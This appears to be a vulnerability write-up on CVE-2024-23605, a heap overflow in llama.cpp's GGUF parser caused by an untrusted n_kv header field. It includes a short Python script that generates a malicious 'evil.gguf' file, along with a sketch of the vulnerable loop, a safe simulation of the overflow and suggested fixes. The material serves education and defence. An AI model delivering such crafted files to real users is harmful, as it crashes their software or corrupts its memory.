CVE-2024-23605 - Heap-Based Buffer Overflow in llama.cpp’s GGUF Library (`header.n_kv`)

Researchers recently disclosed CVE-2024-23605, a critical heap-based buffer overflow in the GGUF library used by llama.cpp. It affects the processing of .gguf files, specifically the handling of the header's n_kv field. The vulnerability was introduced in commit 18c2e17, and it allows attackers to execute arbitrary code by tricking a victim into loading a malicious .gguf file.

Let's walk through how the vulnerability works, its impact, and show a demonstration exploit so you can really see what's going on.

What is GGUF and Where Does the Bug Lurk?

GGUF is a binary file format used to store large language models such as LLaMA. llama.cpp, a fast inference tool for running these models, has to parse these files. The file header contains a field called n_kv, which gives the number of "key-value" pairs of metadata describing the model.
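
To make the header concrete, here is a minimal Python sketch that pulls the magic, version, and n_kv out of a byte string. It assumes the simplified layout used for illustration in this article (4-byte magic, 32-bit version, 32-bit n_kv, all little-endian). The real GGUF header has more fields and may use wider integers, so the layout and the name read_simple_header are hypothetical.

```python
import struct

# Hypothetical simplified layout: 4-byte magic, uint32 version, uint32 n_kv,
# all little-endian. The real GGUF header differs from this.
SIMPLE_HEADER = struct.Struct("<4sII")


def read_simple_header(data: bytes):
    """Return (magic, version, n_kv) decoded from the first 12 bytes of data."""
    if len(data) < SIMPLE_HEADER.size:
        raise ValueError("file too short to contain a header")
    magic, version, n_kv = SIMPLE_HEADER.unpack_from(data, 0)
    if magic != b"GGUF":
        raise ValueError("not a GGUF file")
    return magic, version, n_kv


# A tiny well-formed header claiming version 3 and two key-value pairs.
sample = b"GGUF" + struct.pack("<II", 3, 2)
print(read_simple_header(sample))  # (b'GGUF', 3, 2)
```

Note that the parser only decodes n_kv; nothing in the header itself proves that the file really contains that many pairs.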

Inside the code, reading this number is simple:

// code snippet from llama.cpp/gguf.c
gguf_header_t header;
fread(&header, sizeof(header), 1, fin);
uint32_t n_kv = header.n_kv;
// ... allocation for kv pairs ...
kv_pairs = malloc(n_kv * sizeof(gguf_kv_t));

But here's where things go awry. The code takes n_kv directly from the file, so an attacker can set it to any value. If the file claims to have, say, 0xFFFFFFFF (about 4.29 billion) key-value pairs, the code will attempt to allocate an enormous amount of memory. If malloc cannot satisfy the request it returns NULL, and a missing NULL check turns that into an invalid write. Alternatively, the allocation might succeed with fewer bytes than the parser needs (for example, if n_kv * sizeof(gguf_kv_t) wraps around in the integer type used), and the parsing loop, which still runs n_kv times, then writes past the end of the buffer.
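
The arithmetic behind both outcomes can be sketched in a few lines of Python. This models the multiplication inside the malloc call as unsigned arithmetic of a given width. ENTRY_SIZE stands in for sizeof(gguf_kv_t) and is a made-up value, as is the function name requested_bytes; the real structure size depends on the build.

```python
ENTRY_SIZE = 48  # hypothetical sizeof(gguf_kv_t); not taken from llama.cpp


def requested_bytes(n_kv: int, entry_size: int = ENTRY_SIZE, size_bits: int = 64) -> int:
    """Model n_kv * entry_size computed in an unsigned integer of size_bits bits."""
    return (n_kv * entry_size) % (1 << size_bits)


# With a 64-bit size type the product does not wrap; the request is just huge
# (about 192 GiB), so malloc is likely to fail and return NULL.
print(requested_bytes(0xFFFFFFFF))                # 206158430160

# With a 32-bit size type the product wraps around: the program asks for only
# 48 bytes, yet the parsing loop would still try to fill 0x10000001 entries.
print(requested_bytes(0x10000001, size_bits=32))  # 48
```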

Exploit Details: How Can Attackers Trigger This Bug?

If an attacker crafts a .gguf file with a dangerous n_kv value and convinces you to run llama.cpp against it (for conversion, inspection, or inference), they can:

- Overwrite memory immediately following the heap allocation, possibly corrupting program control structures or function pointers.
- Under some circumstances, achieve arbitrary code execution — letting them run malicious code on your system.

Here’s a minimal Python script to generate a malicious file:

import struct

# GGUF magic and version
header = b'GGUF'
version = struct.pack('<I', 3)

# Malicious: n_kv is huge! Set to 0x10000000
n_kv = struct.pack('<I', 0x10000000)

# Padding to fill header
rest = b'\x00' * (256 - 12)  # for illustration

with open('evil.gguf', 'wb') as f:
    f.write(header + version + n_kv + rest)

When this file is consumed by an affected build of llama.cpp (such as commit 18c2e17), its GGUF parsing logic will try to allocate a huge chunk of RAM based on the attacker's n_kv, opening the door for heap corruption and exploitation.

Proof-of-Concept Example

A real exploit would take several steps: grooming the heap so that useful control structures sit right after the vulnerable buffer, then using the overflow to write crafted values (such as a function pointer or vtable pointer) just past the end of the allocation.

A simplified C sketch of the vulnerable read loop:

// Suppose this pseudo-code comes after the allocation:
for (uint32_t i = 0; i < n_kv; i++)
    fread(&kv_pairs[i], sizeof(gguf_kv_t), 1, fin);

If n_kv is so large that malloc fails and returns NULL, and the result isn't checked, the loop writes through a NULL pointer: an immediate crash on most systems (or a possible exploit if that address happens to be mapped). If instead the allocation succeeds but holds fewer than n_kv entries, the loop keeps copying file data past the end of the buffer and overwrites whatever the heap placed after it.
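
The second case can be simulated safely in Python. The sketch below is a toy model, not llama.cpp code: a bytearray plays the role of the heap, the first 8 bytes are the allocated buffer (room for two 4-byte entries), and the next 8 bytes belong to a neighboring allocation. The function unchecked_read and all sizes are made up for illustration.

```python
def unchecked_read(heap: bytearray, buf_start: int, n_kv: int,
                   entry_size: int, source: bytes) -> None:
    """Copy up to n_kv entries from source into heap, trusting n_kv blindly."""
    for i in range(n_kv):
        chunk = source[i * entry_size:(i + 1) * entry_size]
        if len(chunk) < entry_size:
            break  # the file ran out of data, so nothing more is copied
        dst = buf_start + i * entry_size
        heap[dst:dst + entry_size] = chunk  # no check against the buffer's end


ENTRY = 4
# Toy heap: an 8-byte buffer (2 entries) followed by a neighbor's 8 bytes.
heap = bytearray(b"\x00" * 8 + b"NEIGHBOR")
payload = b"AAAA" * 4  # the file supplies 4 entries, and n_kv claims 4

unchecked_read(heap, buf_start=0, n_kv=4, entry_size=ENTRY, source=payload)
print(heap)  # bytearray(b'AAAAAAAAAAAAAAAA'): the neighbor's data is gone
```

In a real process the overwritten neighbor could be heap metadata or an object holding a pointer, which is what makes this class of bug exploitable rather than merely a crash.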

How to Fix

The maintainers patched this bug by bounding the value and checking for allocation failure right after reading n_kv, something like:

if (n_kv > MAX_REASONABLE_KV) {
    // error! suspiciously huge value
    exit(1);
}
kv_pairs = malloc(n_kv * sizeof(gguf_kv_t));
if (!kv_pairs) {
    // allocation failed, handle gracefully
    exit(1);
}

It’s basic input validation — never trust the file!
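
The same idea can be applied before a file ever reaches the parser. The following Python sketch is a pre-flight check under stated assumptions: it uses this article's simplified header layout (magic, 32-bit version, 32-bit n_kv), and both MAX_REASONABLE_KV and MIN_KV_BYTES are hypothetical limits chosen for illustration, not values from the llama.cpp patch.

```python
import struct

MAX_REASONABLE_KV = 1 << 16  # hypothetical upper bound on metadata pairs
MIN_KV_BYTES = 8             # hypothetical minimum on-disk size of one pair
HEADER_SIZE = 12             # simplified layout: magic + version + n_kv


def check_n_kv(data: bytes) -> int:
    """Return n_kv if it is plausible for this file, else raise ValueError."""
    if len(data) < HEADER_SIZE or data[:4] != b"GGUF":
        raise ValueError("not a GGUF file")
    n_kv = struct.unpack_from("<I", data, 8)[0]
    if n_kv > MAX_REASONABLE_KV:
        raise ValueError(f"suspiciously large n_kv: {n_kv}")
    # The file cannot hold more pairs than its remaining bytes allow.
    if n_kv * MIN_KV_BYTES > len(data) - HEADER_SIZE:
        raise ValueError("n_kv is larger than the file can hold")
    return n_kv


good = b"GGUF" + struct.pack("<II", 3, 2) + b"\x00" * 16
evil = b"GGUF" + struct.pack("<II", 3, 0x10000000) + b"\x00" * 244

print(check_n_kv(good))  # 2
try:
    check_n_kv(evil)
except ValueError as err:
    print("rejected:", err)
```

Comparing the claimed count against the actual file size is a useful second check because it needs no tuning: a 256-byte file cannot contain hundreds of millions of entries, whatever the cap is set to.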

Impact and Recommendations

- This vulnerability affects llama.cpp users prior to the patch (see PR 2588).

References

- CVE-2024-23605 MITRE Entry
- Original llama.cpp Commit 18c2e17
- GGUF Format Documentation
- llama.cpp Security Patch

Conclusion

CVE-2024-23605 is a textbook example of why even "simple" input values — like the size of a data structure — must be validated when parsing user-supplied files. If you use llama.cpp, upgrade immediately, and never open ML models from unknown sources.

Stay safe, and always audit the code paths that handle outside data!

Timeline

Published on: 02/26/2024 16:27:57 UTC
Last modified on: 02/26/2024 18:15:07 UTC